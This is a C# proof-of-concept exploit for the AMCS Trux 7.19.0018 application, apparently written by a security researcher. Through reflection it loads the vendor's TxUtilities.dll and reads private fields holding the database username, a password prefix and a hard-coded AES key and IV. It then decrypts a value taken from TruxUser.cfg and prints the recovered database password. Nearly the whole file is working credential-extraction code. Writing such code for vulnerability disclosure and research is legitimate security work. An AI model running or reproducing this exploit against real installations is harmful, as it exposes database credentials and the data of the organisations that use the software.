﻿using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;

namespace DLLReflectionLoader
{
    class Program
    {
        static void Main(string[] args)


        {

            Console.WriteLine("=========================================================");
            Console.WriteLine(" AMCS TRUX 7.19.0018 (219580057) Exploit Proof of Concept");
            Console.WriteLine("=========================================================");
            Console.WriteLine(" This Proof of Concept (POC) exploits an undisclosed");
            Console.WriteLine(" vulnerability in the AMCS Trux application. It is");
            Console.WriteLine(" designed to derive encrypted database credentials");
            Console.WriteLine(" and hard-coded decryption keys.");
            Console.WriteLine(" Author: Bryan Smith, Redline Cyber Security");
            Console.WriteLine(" CONFIDENTIAL USE ONLY");
            Console.WriteLine("==============================================\n");


            // Load the assembly
            Console.WriteLine("Loading TxUtilities.dll...");
            Assembly assembly = Assembly.LoadFrom("TxUtilities.dll");

            // Get the type of the class
            Console.WriteLine("Accessing TxUtilities.Database class...");
            Type type = assembly.GetType("TxUtilities.Database"); // Adjust the namespace and class name as necessary
            if (type == null)
            {
                Console.WriteLine("ERROR: Class not found.");
                return;
            }

            // Create an instance of the class
            Console.WriteLine("Creating an instance of the class...");
            object classInstance = Activator.CreateInstance(type);

            // Access and output values of the private fields
            Console.WriteLine("Retrieving DB User...");
            string fieldValue3 = GetPrivateFieldValue<string>(type, classInstance, "\u0003");
            Console.WriteLine("DB User retrieved: " + fieldValue3);

            Console.WriteLine("Retrieving DB Password (Prefix)...");
            string fieldValue5 = GetPrivateFieldValue<string>(type, classInstance, "\u0005");
            Console.WriteLine("DB Password (Prefix): " + fieldValue5);

            // Read the text file and extract the base64 value
            Console.WriteLine("Extracting Base64 value from TruxUser.cfg...");
            string base64Value = ExtractBase64Value("TruxUser.cfg");
            Console.WriteLine("Config Ciphertext (Base64): " + base64Value);

            // Access private fields for IV and KEY
            Console.WriteLine("Retrieving AES IV...");
            byte[] fieldValueIV = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001A");
            Console.WriteLine("AES IV: " + BitConverter.ToString(fieldValueIV));

            Console.WriteLine("Retrieving AES KEY...");
            byte[] fieldValueKey = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001B");
            Console.WriteLine("AES KEY: " + BitConverter.ToString(fieldValueKey));

            // Decrypt the ciphertext
            Console.WriteLine("Decrypting ciphertext...\n\n");
            byte[] cipherTextBytes = Convert.FromBase64String(base64Value);
            string decryptedText = DecryptStringFromBytes_Aes(cipherTextBytes, fieldValueKey, fieldValueIV);

            // Remove null bytes from the decrypted text
            string cleanedText = decryptedText.Replace("\0", string.Empty);

            // Output combined Database Password
            Console.WriteLine("Database User    : [" + fieldValue3 + "]");
            Console.WriteLine("Database Password: [" + fieldValue5 + cleanedText + "]");

            // Method to get private field value of a specified type
            T GetPrivateFieldValue<T>(Type targetType, object instance, string fieldName)
            {
                FieldInfo fieldInfo = targetType.GetField(fieldName, BindingFlags.NonPublic | BindingFlags.Instance);
                T fieldValue = (T)fieldInfo.GetValue(instance);
                return fieldValue;
            }

            Console.WriteLine("\n\nEXPLOIT COMPLETE");
            Console.WriteLine("Press any key to exit...");
            Console.ReadKey();


        }

        static string ExtractBase64Value(string fileName)
        {
            try
            {
                string line;
                using (StreamReader file = new StreamReader(fileName))
                {
                    while ((line = file.ReadLine()) != null)
                    {
                        if (line.StartsWith("EP_TC10 :"))
                        {
                            return line.Split(':')[1].Trim();
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error reading file: " + ex.Message);
            }
            return null;
        }

        static string DecryptStringFromBytes_Aes(byte[] cipherText, byte[] Key, byte[] IV)
        {

            // Declare the string used to hold the decrypted text.
            string plaintext = null;

            using (Aes aesAlg = Aes.Create())
            {
                aesAlg.Key = Key;
                aesAlg.IV = IV;

                // Create a decryptor to perform the stream transform.
                ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);

                // Create the streams used for decryption.
                using (MemoryStream msDecrypt = new MemoryStream(cipherText))
                {
                    using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
                    {
                        using (StreamReader srDecrypt = new StreamReader(csDecrypt))
                        {
                            // Read the decrypted bytes from the decrypting stream and place them in a string.
                            plaintext = srDecrypt.ReadToEnd();
                        }
                    }
                }
            }

            return plaintext;
        }


    }
}